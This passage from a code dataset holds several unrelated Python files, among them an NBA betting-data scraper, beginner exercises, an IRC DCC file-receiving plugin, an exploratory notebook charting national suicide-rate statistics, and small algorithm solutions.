homeGames):\n nthGame += 1\n listOfRecord.append(homeRecord[i]/nthGame)\n return mt.trailing_weighted_average(listOfRecord, mt.create_triangle_num_list(homeGames))\n\ndef calculate_pythagorean_expectation(tree, team):\n \"\"\"\n Final value will be a weighted average of pythagorean expectation over the season and\n the last 3 games.\n\n season- 70%\n last3 - 30%\n \"\"\"\n stats = tree.xpath('//table[@class=\"tr-table\"]//tr//td[@class=\"text-right\"]/text()')\n power = 8.9\n pointsFor = float(stats[3])\n pointsAgainst = float(stats[13])\n expectation = (pow(pointsFor, power))/(pow(pointsFor, power) + pow(pointsAgainst, power))\n return expectation\n\ndef write(homeTeam, awayTeam):\n homeLong = get_team_long(homeTeam)\n awayLong = get_team_long(awayTeam)\n price_dict = parse_prices(awayLong, homeLong, build_price_dict())\n try:\n page = requests.get('https://www.basketball-reference.com/teams/' + str(homeTeam) + '/2019_games.html')\n tree = html.fromstring(page.content)\n\n newPage = requests.get('https://www.teamrankings.com/nba/team/' + get_team_location(homeTeam) + '/')\n newTree = html.fromstring(newPage.content)\n \n awayPage = requests.get('https://www.basketball-reference.com/teams/' + str(awayTeam) + '/2019_games.html')\n awayTree = html.fromstring(awayPage.content)\n\n newPageAway = requests.get('https://www.teamrankings.com/nba/team/' + get_team_location(awayTeam) + '/')\n newTreeAway = html.fromstring(newPageAway.content)\n except:\n print(\"One or both teams entered does not exist!\")\n sys.exit(1)\n numGamesPlayed = get_record(newTree)\n numGamesPlayedAway = get_record(newTreeAway)\n homeTeamMovingRecord = calculate_moving_team_record(tree, numGamesPlayed)\n awayTeamMovingRecord = calculate_moving_team_record(awayTree, numGamesPlayedAway)\n\n homeTeamMovingHomeRecord = calculate_moving_homegame_record(tree, numGamesPlayed)\n awayTeamMovingAwayRecord = calculate_moving_awaygame_record(tree, 
numGamesPlayedAway)\n\n homeTeamPythagoreanExpectation = calculate_pythagorean_expectation(newTree, homeTeam)\n awayTeamPythagoreanExpectation = calculate_pythagorean_expectation(newTreeAway, awayTeam)\n \n today = datetime.today()\n print(price_dict)\n # print(today)\n # print(homeTeam)\n # print(homeTeamMovingRecord)\n # print(homeTeamMovingHomeRecord)\n # print(homeTeamPythagoreanExpectation)\n # print(price_dict) #home\n # print(awayTeam)\n # print(awayTeamMovingRecord)\n # print(awayTeamMovingAwayRecord)\n # print(awayTeamPythagoreanExpectation)\n # print(price_dict[0])\n\n\n \n with open('1920.csv', 'a') as csv_file:\n\n csv_writer = csv.writer(csv_file, delimiter=',')\n csv_writer.writerow([today, \n homeTeam, \n homeTeamMovingRecord, \n homeTeamMovingHomeRecord, \n homeTeamPythagoreanExpectation, \n price_dict[1], \n awayTeam, \n awayTeamMovingRecord, \n awayTeamMovingAwayRecord, \n awayTeamPythagoreanExpectation, \n price_dict[0]])\n \n\n","repo_name":"miller-ian/miller-fund","sub_path":"king_scraper.py","file_name":"king_scraper.py","file_ext":"py","file_size_in_byte":8681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28154711472","text":"from functools import wraps\n\n\ndef my_for(iterable, func):\n iterator = iter(iterable)\n while True:\n try:\n thing = next(iterator)\n except StopIteration:\n break\n else:\n func(thing)\n\n\ndef square(x):\n print(x*x)\n\n# it do not need an array with 4 million beat\n\n\ndef current_beat():\n nums = (1, 2, 3, 4)\n i = 0\n while True:\n if i > len(nums):\n i = 0\n yield nums[i]\n i += 1\n\n\ndef fib_gen(max):\n x, y = 0, 1\n count = 0\n while count < max:\n x, y = y, x + y\n yield y # it will reduce memory, if not we will need a list to store massive\n # of number (may be 1 million, 4 million or 1 billion), but it wil slower\n count += 1\n\n\ndef be_polite(fn):\n @wraps(fn) # you pass fn in here and call be_polite\n # be_polite return wrapper\n # so doc and name will be the func you called (wrapper)\n # to prevent it we use wraps\n def wrapper():\n \"\"\"I am a wrapper func\"\"\"\n print(f\"you are about to call: {fn.__name__}\")\n print(f\"here's the documentation: {fn.__doc__}\")\n print(\"What a pleasure to meet you!!\")\n fn()\n print(\"Have a great day!!\")\n return wrapper\n\n\ndef greet():\n print(\"My name is Hog!!\")\n\n\n@be_polite # <=> rage = be_polite(rage)\ndef rage():\n \"\"\" print something rage \"\"\"\n print(\"I hate you\")\n\n\nrage()\nprint(rage.__doc__)\nprint(rage.__name__)\n\n\nwrapper_greet = be_polite(greet)\n\n# if we @polite_rage we don't have to:\n# rage = be_polite(rage)\n\n\n# my_for([1, 2, 3, 4], square)\n","repo_name":"mhoang2004/learn-python","sub_path":"Iterator&Generator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810381372","text":"from collections import deque\nstack = deque()\nn = int(input())\n\nans = [0] * 100000\nh = [0] * 100000\n\nfor i in range(1, n+1):\n h[i] = int(input())\n# 反向遍历牛的身高\nfor j in range(n, 0, -1):\n while stack and h[stack[-1]] <= h[j]:\n stack.pop()\n if not stack:\n ans[j] = 0\n else:\n ans[j] = stack[-1]\n stack.append(j)\nfor k in range(1, n+1):\n 
print(ans[k])\n","repo_name":"wan7yu/Python-code","sub_path":"洛谷/栈/p2947/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20147256622","text":"\"\"\"\nOverview\n========\n\nThis plugin is used to receive files automatically through dcc.\n\nUsage\n=====\n\nOnce this plugin is installed and a directory was set in your ameliarc then whatever files\nthat are sent to the bot it will be saved in directory that was chosen.\n\n\"\"\"\n\nfrom quickirc import send_msg, DccClient\nfrom os.path import isfile, join\nfrom untwisted.event import CLOSE, CONNECT_ERR, DONE\nfrom untwisted.iputils import long_to_ip\n\nclass Get(object):\n def __init__(self, server, folder):\n self.folder = folder\n server.add_map('DCC SEND', self.dcc_get)\n\n def dcc_get(self, server, xxx_todo_changeme, filename, address, port, size):\n \n (nick, user, host, \n target, msg) = xxx_todo_changeme\n path = join(self.folder, filename)\n\n if isfile(path): \n send_msg(server, nick, 'File already exists.')\n else:\n fd = open(path, 'wb')\n dccclient = DccClient(long_to_ip(int(address)), \n int(port), fd, int(size)) \n \n def is_done(dcclient, msg):\n send_msg(server, nick, msg)\n fd.close()\n \n dccclient.add_map(DONE, is_done, 'Done.')\n dccclient.add_map(CLOSE, lambda dccclient, ssock, err: is_done(ssock, 'Failed.'))\n dccclient.add_map(CONNECT_ERR, lambda dccclient, ssock, err: is_done(\"It couldn't connect.\"))\n \n \ninstall = Get\n\n\n\n\n\n\n\n\n","repo_name":"untwisted/amelia","sub_path":"ameliabot/plugins/dcc_get.py","file_name":"dcc_get.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10147310735","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#
    General Analysis of Suicide Rates\n#\n# Our aim is to make a general analysis of suicide rates and explain these rates in detail.\n#\n# Dataset Feature List\n#\n# * country\n# * year\n# * sex\n# * age\n# * suicides_no\n# * population\n# * suicides/100k pop\n# * country-year\n# * HDI for year\n# * gdp_for_year\n# * gdp_per_capita\n# * generation\n#\n# Contents: References, Conclusion\n#\n# Last Updated : 12.05.2019\n#\n# If you like it, please upvote.
    
    \n\n# In[ ]:\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nwarnings.filterwarnings('ignore')\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# In[ ]:\n\n\n#dataset read operation\n#read_csv function is required to read the data.\ndata=pd.read_csv('../input/master.csv')\n\n# In[ ]:\n\n\n#show data first 5 rows\ndata.head()\n\n# In[ ]:\n\n\n#show data last 5 rows\ndata.tail()\n\n# In[ ]:\n\n\n#random rows in dataset\ndata.sample(5)\n\n# In[ ]:\n\n\ndata.sample(frac=0.1)\n\n# In[ ]:\n\n\n#Describe function includes analysis of all our numerical data. For this, count, mean, std, min,% 25,% 50,% 75, max values are given.\ndata.describe()\n\n# In[ ]:\n\n\ndata.iloc[:,1:5].describe()\n\n# In[ ]:\n\n\n#The info function shows the data types and numerical values of the features in our data set.\ndata.info()\n\n# In[ ]:\n\n\n#We will now set the headings of the feature values in the data set.\ndata.columns\n\n# In[ ]:\n\n\n#so,change the names of the column. Because there may be problems for future analysis.\ndata=data.rename(columns={'country':'Country','year':'Year','sex':'Gender','age':'Age','suicides_no':'SuicidesNo','population':'Population','suicides/100k pop':'Suicides100kPop','country-year':'CountryYear','HDI for year':'HDIForYear',' gdp_for_year ($) ':'GdpForYearMoney','gdp_per_capita ($)':'GdpPerCapitalMoney','generation':'Generation'})\n\n# In[ ]:\n\n\ndata.columns\n\n# In[ ]:\n\n\n#And, how many rows and columns are there for all data?\nprint('Data Shape :')\ndata.shape\n\n# In[ ]:\n\n\ndata.isnull().any()\n\n# In[ ]:\n\n\ndata.isnull().values.any()\n\n# In[ ]:\n\n\n#Now,I will check null on all data and If data has null, I will sum of null data's. In this way, how many missing data is in the data.\ndata.isnull().sum()\n\n# In[ ]:\n\n\n#As you can see, most of the HDIForYear value is empty. That's why I want this value deleted.\ndata=data.drop(['HDIForYear','CountryYear'],axis=1)\n\n# In[ ]:\n\n\n#Now start analysis, min year and max year will find them\nmin_year=min(data.Year)\nmax_year=max(data.Year)\nprint('Min Year :',min_year)\nprint('Max Year :',max_year)\n\n#1985 min year,2016 max year.\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985=data[(data['Year']==min_year)].Country.unique()\ncountry_1985_male=[]\ncountry_1985_female=[]\n\nfor country in country_1985:\n country_1985_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_1985_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_male,color='red')\nsns.barplot(y=country_1985,x=country_1985_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('1985 Year Suicide Rate Gender')\nplt.show()\n\n#Very odd all the rates came on an equal level. 
So let's do max year.\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016=data[(data['Year']==max_year)].Country.unique()\ncountry_2016_male=[]\ncountry_2016_female=[]\n\nfor country in country_2016:\n country_2016_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_2016_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_male,color='red')\nsns.barplot(y=country_2016,x=country_2016_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('2016 Year Suicide Rate Gender')\nplt.show()\n\n#
    While the suicide rate was widespread in more countries in 1985, this ratio has fallen considerably in 2016. Now let us examine the other features of these countries.
    
    \n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985_population=[]\n\nfor country in country_1985:\n country_1985_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('1985 Year Sum Population for Suicide Rate')\nplt.show()\n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016_population=[]\n\nfor country in country_2016:\n country_2016_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('2016 Year Sum Population for Suicide Rate')\nplt.show()\n\n\n#
    The values found above give the total population of each country with recorded suicides, for 1985 and for 2016.
    
    \n\n# In[ ]:\n\n\nsuicideGender1985=data_country.groupby(['Country','Gender']).SuicidesNo.sum()\n\n# In[ ]:\n\n\nsuicideGender1985\n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_1985:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_2016:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n#there is an equal rate. We need to make the query process a little more complicated.\n\n# In[ ]:\n\n\nsns.countplot(data.Gender)\nplt.show()\n#there has been an even gender distribution.\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,5))\nsns.countplot(data.Gender,hue=data.Age)\nplt.title('Gender & Age')\nplt.show()\n#there has been an even gender & hue age distribution.\n\n# In[ ]:\n\n\ndata.groupby('Age')['Gender'].count()\n\n# In[ ]:\n\n\nsns.barplot(x=data.groupby('Age')['Gender'].count().index,y=data.groupby('Age')['Gender'].count().values)\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\nsuicidesNo=[]\nfor country in data.Country.unique():\n suicidesNo.append(sum(data[data['Country']==country].SuicidesNo)) \n\n# In[ ]:\n\n\nsuicidesNo=pd.DataFrame(suicidesNo,columns=['suicidesNo'])\ncountry=pd.DataFrame(data.Country.unique(),columns=['country'])\ndata_suicide_countr=pd.concat([suicidesNo,country],axis=1)\n#sns.barplot(x=data.Country.unique(),y=suicidesNo) \n#plt.show()\n\n# In[ ]:\n\n\ndata_suicide_countr=data_suicide_countr.sort_values(by='suicidesNo',ascending=False)\n\n# In[ ]:\n\n\nsns.barplot(y=data_suicide_countr.country[:15],x=data_suicide_countr.suicidesNo[:15])\nplt.show()\n\n#
    After examining the data, we computed the total number of suicides per country and prepared a chart ordering the countries from the most to the least.
    
    \n\n# In[ ]:\n\n\ngrouop_data=data.groupby(['Age','Gender'])['SuicidesNo'].sum().unstack()\ngrouop_data=grouop_data.reset_index().melt(id_vars='Age')\n\n# In[ ]:\n\n\ngrouop_data_female=grouop_data.iloc[:6,:]\ngrouop_data_male=grouop_data.iloc[6:,:]\n\n# In[ ]:\n\n\ngrouop_data_female\n\n# In[ ]:\n\n\ngrouop_data_male\n\n# In[ ]:\n\n\nfemale_=[175437,208823,506233,16997,430036,221984]\nmale_=[633105,915089,1945908,35267,1228407,431134]\nplot_id = 0\nfor i,age in enumerate(['15-24 years','25-34 years','35-54 years','5-14 years','55-74 years','75+ years']):\n plot_id += 1\n plt.subplot(3,2,plot_id)\n plt.title(age)\n fig, ax = plt.gcf(), plt.gca()\n sns.barplot(x=['female','male'],y=[female_[i],male_[i]],color='blue')\n plt.tight_layout()\n fig.set_size_inches(10, 15)\nplt.show() \n\n#
    All data were analyzed: suicide totals were plotted for each age group, broken down by gender.
    
    \n\n# In[ ]:\n\n\nsns.countplot(data.Generation)\nplt.title('Generation Counter')\nplt.xticks(rotation=45)\nplt.show()\n\n# In[ ]:\n\n\nsns.countplot(data.Generation,hue=data.Gender)\nplt.title('Generation hue Gender Counter')\nplt.show()\n\n# In[ ]:\n\n\ndata['Age'].unique()\n\n# In[ ]:\n\n\nindex_population=[]\nfor age in data['Age'].unique():\n index_population.append(sum(data[data['Age']==age].Population)/len(data[data['Age']==age].Population))\n \nplt.bar(['15-24 years','35-54 years','75+ years','25-34 years','55-74 years','5-14 years'],index_population,align='center',alpha=0.5)\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\nindex_population\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,5))\nsns.set(style='whitegrid')\nsns.boxplot(data['Population'])\nplt.show()\n\n# In[ ]:\n\n\ndata.head()\n\n# In[ ]:\n\n\nsns.set(style='whitegrid')\nsns.boxplot(data['GdpPerCapitalMoney'])\nplt.show()\n\n# In[ ]:\n\n\nsns.set(style='whitegrid')\nsns.boxplot(data.Year)\nplt.show()\n\n# In[ ]:\n\n\n# Plot the crashes where alcohol was involved\nsns.set_color_codes(\"muted\")\nsns.barplot(x=\"Year\", y=\"SuicidesNo\", data=data,\n label=\"Year Suicides\", color=\"b\")\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\n\nplt.figure(figsize=(7,7))\ng = sns.FacetGrid(data, col=\"Generation\", hue=\"Year\",\n subplot_kws=dict(projection='polar'), height=5.5,\n sharex=False, sharey=False, despine=False)\n\nplt.show()\n\n# In[ ]:\n\n\n# Plot sepal with as a function of sepal_length across days\ng = sns.lmplot(x=\"Year\", y=\"SuicidesNo\", hue=\"Generation\",\n truncate=True, height=5, data=data)\n\n# Use more informative axis labels than are provided by default\ng.set_axis_labels(\"Year\", \"Suicides No\")\nplt.show()\n\n# In[ ]:\n\n\ndata.head()\n\n# In[ ]:\n\n\ndata.describe().plot(kind = \"Area\",fontsize=15, figsize = (20,10), table = True,colormap=\"rainbow\")\nplt.xlabel('Statistics',)\nplt.ylabel('Value')\nplt.title(\"General Statistics\")\nplt.show()\n\n# In[ ]:\n\n\nf,ax=plt.subplots(1,2,figsize=(18,8))\ndata['Generation'].value_counts().plot.pie(explode=[0.1,0.1,0.1,0.1,0.1,0.1],autopct='%1.1f%%',ax=ax[0],shadow=True)\nax[0].set_title('Generations Count')\nax[0].set_ylabel('Count')\nsns.countplot('Generation',data=data,ax=ax[1])\nax[1].set_title('Generations Count')\nplt.show()\n\n# In[ ]:\n\n\nfig=sns.jointplot(y='Suicides100kPop',x='Year',data=data)\nplt.show()\n\n# In[ ]:\n\n\nfig=sns.jointplot(y='SuicidesNo',x='Population',data=data)\nplt.show()\n\n# In[ ]:\n\n\nsns.jointplot(\"Year\", \"GdpPerCapitalMoney\", data=data, kind=\"reg\")\nplt.show()\n\n# In[ ]:\n\n\n# Show the joint distribution using kernel density estimation\ng = sns.jointplot(data.Year,data.GdpPerCapitalMoney, kind=\"kde\", height=7, space=0)\nplt.show()\n\n# In[ ]:\n\n\nfig=sns.jointplot(y='GdpPerCapitalMoney',x='SuicidesNo',kind='hex',data=data[data['Country']=='United States'])\nplt.show()\n\n# In[ ]:\n\n\nsns.jointplot(\"Suicides100kPop\", \"SuicidesNo\", data=data[data['Country']=='Russian Federation'], kind=\"kde\",space=0,color='g')\nplt.show()\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nsns.FacetGrid(data,hue='Year',size=5).map(plt.scatter,'GdpPerCapitalMoney','Population').add_legend()\nplt.show()\n\n# In[ ]:\n\n\nsns.FacetGrid(data, hue=\"Generation\", size=6).map(sns.kdeplot, \"Population\").add_legend()\nplt.ioff() \nplt.show()\n\n# In[ ]:\n\n\nsns.countplot(x=\"Generation\", hue=\"Gender\",\n data=data)\nplt.xticks(rotation=45)\nplt.show()\n\n# In[ 
]:\n\n\nsns.stripplot(x=data['SuicidesNo'])\nplt.show()\n\n# In[ ]:\n\n\nsns.set(style=\"white\")\n# Plot miles per gallon against horsepower with other semantics\nsns.relplot(x=\"Generation\",y=\"SuicidesNo\",hue=\"Gender\",\n sizes=(40, 400), alpha=.5, palette=\"muted\",\n height=6, data=data)\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,7))\nsns.stripplot(x=\"Year\",y='Suicides100kPop',data=data)\nplt.xticks(rotation=45)\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,10))\nsns.factorplot(x=\"SuicidesNo\", y=\"Gender\", kind='violin',data=data)\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['Suicides100kPop'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['SuicidesNo'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['Population'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['GdpPerCapitalMoney'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nsns.distplot(data['Suicides100kPop'])\nplt.show()\n\n# In[ ]:\n\n\nsns.set_color_codes()\nsns.distplot(data['Country'].value_counts().values,color='r')\nplt.show()\n\n# In[ ]:\n\n\ndata[(data['Gender']=='male')].Age.value_counts().values\n\n# In[ ]:\n\n\n# Plot the responses for different events and regions\nsns.lineplot(x=\"SuicidesNo\", y=\"Suicides100kPop\",\n hue=\"Gender\",data=data.sort_values(by='Suicides100kPop',ascending=False))\nplt.show()\n\n# In[ ]:\n\n\nsns.pairplot(data,hue='Generation')\nplt.show()\n\n# In[ ]:\n\n\nsns.pairplot(data, hue=\"Gender\")\nplt.show()\n\n# In[ ]:\n\n\n# Plot the residuals after fitting a linear model\nsns.residplot('SuicidesNo','Suicides100kPop', data=data,lowess=True, color=\"g\")\nplt.show()\n\n# In[ ]:\n\n\nsns.distplot(data[(data['Gender']=='female')].Age.value_counts().values)\nplt.show()\n\n# In[ ]:\n\n\nsns.violinplot(x=data['Generation'],y=data['Population'])\nplt.show()\n\n# In[ ]:\n\n\nsns.heatmap(data.corr(),cmap='YlGnBu',annot=True)\nplt.show()\n\n# In[ ]:\n\n\n# Draw the heatmap with the mask and correct aspect ratio\nsns.heatmap(data.corr(), vmax=.3, center=1,\n square=True, linewidths=.5,annot=True)\nplt.show()\n\n# In[ ]:\n\n\ncmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n# Draw the heatmap with the mask and correct aspect ratio\nsns.heatmap(data.corr(), cmap=cmap, vmax=.3, center=0,\n square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\nplt.show()\n\n# In[ ]:\n\n\nsns.boxplot(x=data['Generation'],y=data['Population'])\nplt.xticks(rotation=90)\n\n# In[ ]:\n\n\nsns.boxenplot(x=\"Generation\", y=\"SuicidesNo\",\n color=\"b\",\n scale=\"linear\", data=data)\nplt.tight_layout()\nplt.show()\n\n# In[ ]:\n\n\ndata.head()\n\n# In[ ]:\n\n\nmax(data.SuicidesNo)\n\n# In[ ]:\n\n\nmin(data.SuicidesNo)\n\n# In[ ]:\n\n\ndata[data.SuicidesNo==max(data.SuicidesNo)]\n\n# In[ ]:\n\n\ndata[data['Country']=='Russian Federation'].hist()\nplt.tight_layout()\nplt.show()\n\n# In[ ]:\n\n\ndata[data.SuicidesNo==min(data.SuicidesNo)]\n\n# In[ ]:\n\n\ndata[data['Country']=='Albania'].hist()\nplt.tight_layout()\nplt.show()\n\n# In[ ]:\n\n\n# Show the results of a linear regression within each dataset\nsns.lmplot(x=\"Population\", y=\"GdpPerCapitalMoney\", data=data)\nplt.show()\n\n# In[ ]:\n\n\nsns.set(style=\"whitegrid\")\n\n# Make an example dataset with y ~ x\nrs = np.random.RandomState(7)\nx = rs.normal(2, 1, 75)\ny = 2 + 1.5 * x + rs.normal(0, 2, 75)\n\n# Plot the residuals after fitting a linear model\nsns.residplot(x, y, lowess=True, 
color=\"g\")\nplt.show()\n\n# In[ ]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\nle=LabelEncoder()\ndata.iloc[:,-1]=le.fit_transform(data.iloc[:,-1])\n\n# In[ ]:\n\n\ndata.head(2)\n\n# In[ ]:\n\n\nsns.pairplot(data, hue=\"Generation\")\nplt.show()\n\n#
    References\n#\n# https://www.kaggle.com/spscientist/students-performance-in-exams\n# https://seaborn.pydata.org/\n# https://www.kaggle.com/kanncaa1/seaborn-tutorial-for-beginners\n# https://www.kaggle.com/biphili/seaborn-plot-to-visualize-iris-data\n# https://www.kaggle.com/kralmachine/seaborn-tutorial-for-beginners\n\n# Conclusion\n#\n# As a result, we have explained the seaborn library in detail and created a wide variety of graphs. If you found this kernel useful, an upvote would be greatly appreciated, and I am happy to answer any questions. My earlier kernels are listed below:\n#\n# https://www.kaggle.com/kralmachine/data-visualization-of-suicide-rates\n# https://www.kaggle.com/kralmachine/gradient-admission-eda-ml-0-92\n# https://www.kaggle.com/kralmachine/football-results-from-1872-to-2018-datavisulation\n# https://www.kaggle.com/kralmachine/pandas-tutorial-for-beginner\n# https://www.kaggle.com/kralmachine/visual-analysis-of-world-happiness-in-2015
    
    \n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample531.py","file_name":"sample531.py","file_ext":"py","file_size_in_byte":18220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21150685799","text":"def gcd(a, b):\n x = max(a, b)\n y = min(a, b)\n while y != 0:\n x, y = y, x % y\n return x\n\n\ndef mod_mul(x, y, n):\n res = 0\n i = 1\n j = x % n\n while i <= y:\n if y & i != 0:\n res += j\n res %= n\n i *= 2\n j *= 2\n j %= n\n return res\n\n\ndef cycle(x, n):\n y = x\n count = 1\n while y != 1:\n y = mod_mul(y, x, n)\n count += 1\n return count\n\n\ndef lcm(x, y):\n return x * y // gcd(x, y)\n\n\ndef best_remainder(a):\n best = 2\n x, y = a - 1, a + 1\n for i in range(lcm(cycle(a - 1, a ** 2), cycle(a + 1, a ** 2))):\n if (x + y) % a ** 2 > best:\n best = (x + y) % a ** 2\n x = mod_mul(x, a - 1, a ** 2)\n y = mod_mul(y, a + 1, a ** 2)\n return best\n\n\ndef total(n):\n return sum([best_remainder(i) for i in range(3, n + 1)])\n","repo_name":"womri1998/ProjectEuler100s","sub_path":"problem120.py","file_name":"problem120.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4187247313","text":"class Node:\n def __init__(self, val, next=None):\n self.val = val\n self.next = None\n\n def __str__(self):\n return f'{self.val},{self.next}'\n \nclass CLL:\n def __init__(self):\n self.head = None\n\n def insert(self, val):\n if self.head is None:\n self.head = Node(val)\n self.head.next = self.head\n return\n cur=dum=self.head\n while cur.next is not dum:\n cur=cur.next\n cur.next=Node(val)\n cur.next.next=dum\n \n def display(self,head):\n cur=self.head\n op = [str(cur.val)]\n cur=cur.next\n while cur is not self.head:\n op.append(str(cur.val))\n cur=cur.next\n return ' -> '.join(op)\n\n def splitl(self,head):\n f=s=head\n while f.next is not head and f.next.next is not head:\n f=f.next.next\n s=s.next\n print(f'second half is {self.display(s.next)}')\n\ncll=CLL()\ncll.insert(1)\ncll.insert(2)\ncll.insert(3)\ncll.insert(4)\nprint(cll.display(cll.head))\ncll.splitl(cll.head)\n","repo_name":"mahadev521/Book1","sub_path":"linkedlists/cll.py","file_name":"cll.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42632310261","text":"#This script is part of supplementary documents of \"Impact of Introns and Homing Endonucleases on Structural Mitogenome Shaping in Hypocreales\"\n#submitted to Frontiers in Microbiology, section Fungi and Their Interactions\n#Manuscript ID: 531057\n#Authors: Paula Fonseca, Fernanda Badotti, Ruth De-Paula, Daniel Araújo, Dener Eduardo Bortolini, Luiz-Eduardo Del-Bem, Vasco Ariston De Carvalho Azevedo, \n#Bertram Brenig, Eric Roberto Guimarães Rocha Aguiar, Aristóteles Góes-Neto\n\n#This script calculates the GC content of whole genome, CDS and genes in the uORFs file\n#The files used are as follow: \n# -uORFs - Generated by Mfannot2uORFs.py script\n# -cds - Generated by getGenesGenBank2Cds.py script\n# -fasta - Donwloaded from NCBI\n\n#******************************************************************************#\n# Run the code in Python 3+ #\n#******************************************************************************#\n\n# -*- Coding: UTF-8 -*-\n#coding: utf-8\n\nimport sys\nimport os.path\nfrom os import path\n\ndef checkInputFiles():\n # #Check if all the necessary 
